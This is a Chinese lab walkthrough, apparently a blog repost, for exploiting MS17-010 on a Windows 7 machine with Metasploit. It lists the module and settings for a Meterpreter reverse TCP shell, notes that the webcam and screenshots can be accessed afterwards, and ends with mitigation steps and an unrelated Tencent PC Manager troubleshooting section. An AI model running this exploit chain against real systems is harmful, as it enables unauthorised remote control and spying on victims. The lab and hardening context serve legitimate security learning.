靶机:windows7 x64 IP:192.168.1.5
攻击机:Kali Rolling (2019.3) x64 IP:192.168.1.3
两台主机在同一网段内;win7关闭防火墙并且开启445端口。
1、使用ipconfig/ifconfig分别查看win7和kali的ip。
2、打开msf工具
每次开启都会有不同的界面
3、使用search命令搜索ms17_010
4、选择模块和设置条件
使用use来选择第三个模块,可以直接 use 2,也可以打全
然后用set来设置靶机IP set rhost 192.168.1.5
设置本机IP set lhost 192.168.1.3
设置监听端口 set lport 8888 不设置则默认4444端口
设置payload set payload windows/x64/meterpreter/reverse_tcp
还有另外一个payload能用于本实验,具体可以 show payloads 查看
最后,可以使用show options检查所有信息
5、开始渗透 run
稍等片刻 看到win则成功创建会话
6、成功之后,可以开启Windows7的摄像头,截图等等
具体可以用help查看
1、关闭445端口
2、打开防火墙,安装安全软件
3、安装对应补丁,这里就不放链接了
关闭445端口的方法:
1)打开控制面板----Windows防火墙----高级设置
2)点击新建规则,设置端口号的规则并且命名(如图)
msf工具虽然强大,但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。
换腾讯电脑管家修复试试打开腾讯电脑管家——工具箱——漏洞修复
网络是否不稳定(打开腾讯电脑管家——工具箱——网络)
导致漏洞反复修复失败的原因主要有:
1、部分补丁需要重新启动计算机才会真正生效。
解决办法:重新启动计算机。
2、缺少必要的文件会导致MS-Office漏洞修复失败。这可能是软件本身安装不完整,或某些文件已被删除。
解决办法:重新安装Office软件。
3、开启某些防护类软件可能导致修复失败。
解决办法:暂时关闭防护类软件。
4、其它意外的情况导致修复失败。
解决办法:暂时忽略反复修复失败的漏洞,隔一段时间后再次修复。
5、网络连接不正常,无法下载补丁
解决办法:连好网络后再次安装补丁。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)